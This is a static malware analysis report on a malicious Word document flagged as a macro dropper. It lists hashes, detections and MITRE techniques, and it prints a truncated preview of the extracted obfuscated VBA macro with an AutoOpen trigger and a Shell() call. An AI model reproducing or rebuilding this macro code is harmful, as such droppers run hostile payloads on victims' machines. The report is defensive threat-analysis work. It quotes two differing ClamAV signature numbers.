Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 129168ef97cd243b…

MALICIOUS

Office (OLE)

221.0 KB Created: 2018-02-27 05:23:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: d7ffedbfbfb2e8ea4807066577700b2a SHA-1: 05c90b961124c265d60114df7877fc9851b2634c SHA-256: 129168ef97cd243be323636ec3da04a59630e8eaa317549cc0e69445776447a6
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The macro includes a Shell() call, indicating an attempt to execute arbitrary code. ClamAV detected the file as 'Doc.Dropper.Agent-6458199-0', suggesting it's a dropper. The VBA script itself is heavily obfuscated, but the presence of the Shell() call and the ClamAV signature strongly suggest the document's purpose is to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6457894-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6457894-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 61585 bytes
SHA-256: f3a370c8c10680fdd74e36922047fb80202234c5dd9ae674453ac30bf895c4df
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zAnsZRGs"
Sub jHTaHviiMS(hiOQkbpDTl)
   On Error Resume Next
   Dim zjKzfNnuqlkRw()
   ReDim LTCcGFScXZQ(2)
   WHzcCYqoIjQI(0) = 3177291
   qSbqwRPl(1) = 4835403
   nbNfZW = Loo - 2292541
   isqjwOiMaJWc = 478140 * 8695550
End Sub
Function dQIcNsh()
On Error Resume Next
WfHIujbNMNc = "rFqs&&BFTlzTPzGCdQvrwoIHmOPvfYujKqSfVh"
qTThwY = AETvjbfwG = jwwht = (2469864 / zECEqqcSd + 4546985 * cntUPn * (7986538 / SqoQu / 8404478 - Tan(oirwjN / CBool(DfXFnK / 2736932 / cDEWUSIPjKrru))))
DBwcKhIOsSJ = jKoINjBzb = rwTkNzKzfna = (2628108 / MYXqfPKlpVOU + 4206095 * wadMuBWNZAi * (9038376 / WKMDTVYb / 6982330 - Tan(qVhQvBbEQsON / CBool(BbjMPzwWI / 7063003 / oacRvwzHMlnqMl))))
MsJPddN = gjHBjhbyuf(WfHIujbNMNc, 25, 11)
MTzFiUnVwSG = "GMwcIQAP% tes&&szqsYwLtUMjsADtaqTch"
WblCkU = ziGUBcGbZ = JfrSjBLpp = (4919147 / WrXzpHSqobNBoL + 5452952 * UkXBViclMbP * (7876315 / aCCdranjXLVo / 6982231 - Tan(twdCHEVqESYb / CBool(OllOrdEOZLXz / 7095896 / wwYCNlzjpiYI))))
Jrwzw = kQkzjFQlZ = mziKjWUlFFWPZt = (6117551 / KprfwDp + 6668634 * nicbSjzPwKbYC * (1068753 / PDcTmVrqRU / 9037759 - Tan(uuBiHvRsss / CBool(nYXzai / 802985 / IkQPsaWwXvnKG))))
nuujzXVPTqz = gjHBjhbyuf(MTzFiUnVwSG, 20, 9)
kvtdJGZLj = "sRhnLFlidjrjHts&&wo=%2rav% tes&&pIIKSRfsEjc"
DiIPcPAXDl = lKVKRsSZk = jBrnpmBkh = (1409454 / CIPwkK + 8284035 * TOVzhFcwXM * (9560337 / DEQraFEwNbihLn / 6685202 - Tan(GMhha / CBool(RLLEKhMoiYjJD / 9644216 / YXiGsRsknltWa))))
dzpLulEEWkV = sLiQWInFf = vWlZzFzCj = (7040986 / ipCaidY + 5212357 * TQKmwStTm * (8988797 / msBjkHr / 9091414 - Tan(qiKmPKVcpo / CBool(PdICfLzdiMd / 3032426 / aXpoTqaldwjk))))
dpJGfAk = gjHBjhbyuf(kvtdJGZLj, 11, 19)
bbWqbSbJJ = "SmlfzfXlXfqjjv%!!%7zFwAPhlpPdQnizo"
fcfkRjSV = lUiFVnzHk = nBcGHQqfCEW = (2821453 / ozkYzhrKizSlrS + 7979845 * pOkJAHV * (9450764 / AjzvuUvXXtHkOA / 5084473 - Tan(WFDKUPzATMqlF / CBool(jcncwztPncWOUZ / 6529694 / bNKQdCRmcl))))
MIcYmhHOZ = mwbhiKSZM = zlBczHRbnF = (9029479 / SslcaoUiK + 44729 * NLznF * (9733034 / wuMCdpM / 6499395 - Tan(VkqzWqOd / CBool(wBjdFiUzloR / 368376 / McbJzLPO))))
InXrLQbYI = gjHBjhbyuf(bbWqbSbJJ, 16, 6)
XPHfTP = "TbaQoYjzwCwWnQaMbHVkUYDziEMIdftD2rav%!=%8rav% teShnd"
kWMEMBfq = KTtTqlZdf = SLibrzwvnfaKA = (4540349 / tAYZw + 188333 * ZLYWoQFUX * (743658 / aQNrEf / 6307039 - Tan(MDhZzTWPwkBE / CBool(twmSDULiqTI / 4270148 / aHqBw))))
GZpckzMhf = ssLoTrmZD = BIjWzZjU = (5236458 / BKVEWjZDv + 8628333 * YuoILVE * (5605853 / jdRtjhkmWftmPc / 9030368 - Tan(WGSjRidKCcN / CBool(NoDcrjsXscYown / 6390145 / zcJRtZoP))))
kJQbk = gjHBjhbyuf(XPHfTP, 5, 16)
PTJPLcdqonj = "sKWNnav% tes&&sVElbTcWkQUlqz"
smwXnkAVLtk = wkpUizVdQ = GiupV = (6274991 / SwhjvNTXtIIh + 5718016 * sIcvPOofLFl * (7319144 / VKzZKWUpj / 1585147 - Tan(AXVzpoNw / CBool(VOaSuFSwnnbz / 1761303 / zMwjwKJqJAHu))))
BJirSRMj = ssqpWspzD = jifEEX = (380887 / jXriYlsFOmciEa + 2070647 * NaFzQiIJlqcREt * (1171902 / oMTkCJUFwQdD / 4366926 - Tan(CJTfriSEj / CBool(PiwiIbBUjrpsHa / 9465104 / GAAzE))))
jKofwjNlE = gjHBjhbyuf(PTJPLcdqonj, 7, 17)
uiZcrs = "kDkYzNHcdKUiHwpduGjwlD=%TwwKRSfILscWQAimaj"
bVtOMZUuzBi = oFzENZwwb = ESZYlDAWaMLu = (755278 / dzlzEPA + 363580 * zQlQzoFDcj * (7106843 / YhUBnSkCm / 999525 - Tan(BlaQowtMnCnZH / CBool(mBhUIiKSmEQQwR / 9434752 / zsuWkfY))))
oKwalV = YREiWzWkH = BARDidW = (6756375 / zWzXCcPXDvf + 7210861 * HcIDEAo * (4130745 / TIEvQfM / 3328845 - Tan(YnCfCYt / CBool(GGZTp / 5367587 / ltouiYWuMk))))
jwhPS = gjHBjhbyuf(uiZcrs, 6, 16)
HNljdjwLo = "wwXFzzcMonZlqwjhYkaR&!%LEAMJ"
kwYnIhjTMT = TZfYHbXkv = iTiQPX = (277031 / oHmNdDiZBzpN + 6846449 * niXjawYw * (5945049 / MufPjFzdiTnziG / 9214254 - Tan(qhaZvhVOfz / CBool(iwCMqcoAjXTtv / 102489 / fPdnDRk))))
RPFvacwunvi = wIrYECiYR = jMOjjHwWqFM = (776384 / niZjCGksw + 5383574 * zuVSXmWKGjNjmf * (9789458 / jRNLXu / 7200403 - Tan(ufSbS / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.